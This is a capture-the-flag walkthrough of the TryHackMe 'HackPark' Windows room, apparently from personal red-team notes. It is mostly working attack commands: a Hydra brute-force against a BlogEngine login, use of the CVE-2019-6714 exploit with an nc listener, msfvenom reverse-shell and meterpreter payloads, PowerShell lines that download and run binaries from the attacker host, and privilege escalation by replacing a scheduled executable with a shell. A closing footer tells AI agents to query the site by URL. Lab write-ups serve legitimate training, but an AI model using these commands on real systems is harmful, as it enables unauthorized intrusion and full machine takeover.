# HackPark **Room Link:** ### Using Hydra to brute-force a login **What request type is the Windows website login form using?**

**Crafting request for Hydra** Sent a failed login request to Burp to see what it would look like. With this info I was able to craft my request for hydra. I just needed to get the URL and everything that is sent after VIEWSTATE and just change the input to use ^USER^ and ^PASS^ to brute force these fields.

I could also do this without burp by just opening the console and getting the info from there

{% code overflow="wrap" %} ```bash hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt 10.10.110.93 http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=vvTqZ%2FG4tEKhQoxeTpJ%2FyGxM9ZY9ZIvd6YMUS%2BoY3uaQCjC%2BJRdlkd8rbIQsDHztL%2BjsAvOLJhxU7vTNo3GP%2FLEmsndGPNAlCDn%2FB%2FrK2ynp9QkhRe9iqKBUmM5FQT2kX%2Bg%2BfPDNnTuzqW5IlmTujw4sLEzbvvec9FDW4cbQevgTj1tHnKx0vMmkVah5imro0o%2BHvQ5%2FGvpafEs1NdnW6wrSsUFuXnYzletKCdLG%2FgSb7bCDOK4ukZK%2F1cMOgYtjOCU4gk4M7PhQcYZmGpAN7pPVCMpX2YwGnTSgBPPmCB6avoLqG5jRS%2F3PYMjsqEGcD9P9S555GMQPxtfyvOEaJw%2B%2BZELKU2yVYr4uWxamEITsWNAT&__EVENTVALIDATION=Tp%2B5DS80H3PFB8ipJ24uKyHkPhSkqKD7GFJlc2U6IaO61l68aholdIjrZJ%2FsotSi0QxRBQjayWovmb2SU%2Fk6lY%2BOpju62jOGDkAvqcdNsqGrgf3vrAYw88XT2ONABFvDTR771I2YAr7JylJ0HbBZV83nGvvXWSC6rmKDGn80%2FuszTjDZ&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:F=Login failed" -V ``` {% endcode %}

### Compromise the machine **Now you have logged into the website, are you able to identify the version of the BlogEngine?**

**What is the CVE?** CVE-2019-6714 **Exploit Link:** **Using the public exploit, gain initial access to the server. Who is the webserver running as?** Created the file mentioned in the exploit, just changed the IP to my IP.

Setup a nc listener ``` rlwrap nc -lvnp 4445 ``` Upload the file

Navigate to the link and the nc listener should have caught it

### **Windows Privilege Escalation** **Setting up meterpreter shell** **Kali #1** ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.218.233 LPORT=1337 -e x86/shikata_ga_nai -f exe -o reverse.exe python2 -m SimpleHTTPServer 81 ``` **Kali #2** ``` msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.10.218.233 set LPORT 1337 run ``` **Victim** ``` cd C:\Windows\Temp powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.218.233:81/reverse.exe','reverse.exe')" reverse.exe ``` **What is the OS version of this windows machine?**

**Further enumerate the machine. What is the name of the abnormal *****service***** running?** **Check Windows Exploit Suggester** **Kali** ``` git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git cd Windows-Exploit-Suggester/ python3.9 windows-exploit-suggester.py --update python3.9 windows-exploit-suggester2.py --database 2022-12-03-mssb.xls --systeminfo systeminfo.txt ``` **Transfer WinPeas** **Kali** ``` wget https://github.com/carlospolop/PEASS-ng/releases/download/20221127/winPEASx64.exe python2 -m SimpleHTTPServer 81 ``` **Victim** ``` cd C:\Windows\Temp powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.218.233:81/winPEASx64.exe','winPEASx64.exe')" winPEASx64.exe ``` ![](/files/oDvHWOYdRUi4x4JfwhyZ)

``` cd C:\Program Files (x86)\SystemScheduler\Events type 20198415519.INI_LOG.txt ``` We can see Message.exe is kept being ran by Administrator so we just need to replace the file with our reverse shell, setup a listener and wait for the Administrator to try to run it.

**Kali** ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.10.218.233 LPORT=1337 -f exe -o Message.exe python2 -m SimpleHTTPServer 81 rlwrap nc -lvnp 1337 ``` **Victim** ``` cd C:\Program Files (x86)\SystemScheduler powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.218.233:81/Message.exe','Message.exe')" ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/hackpark.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.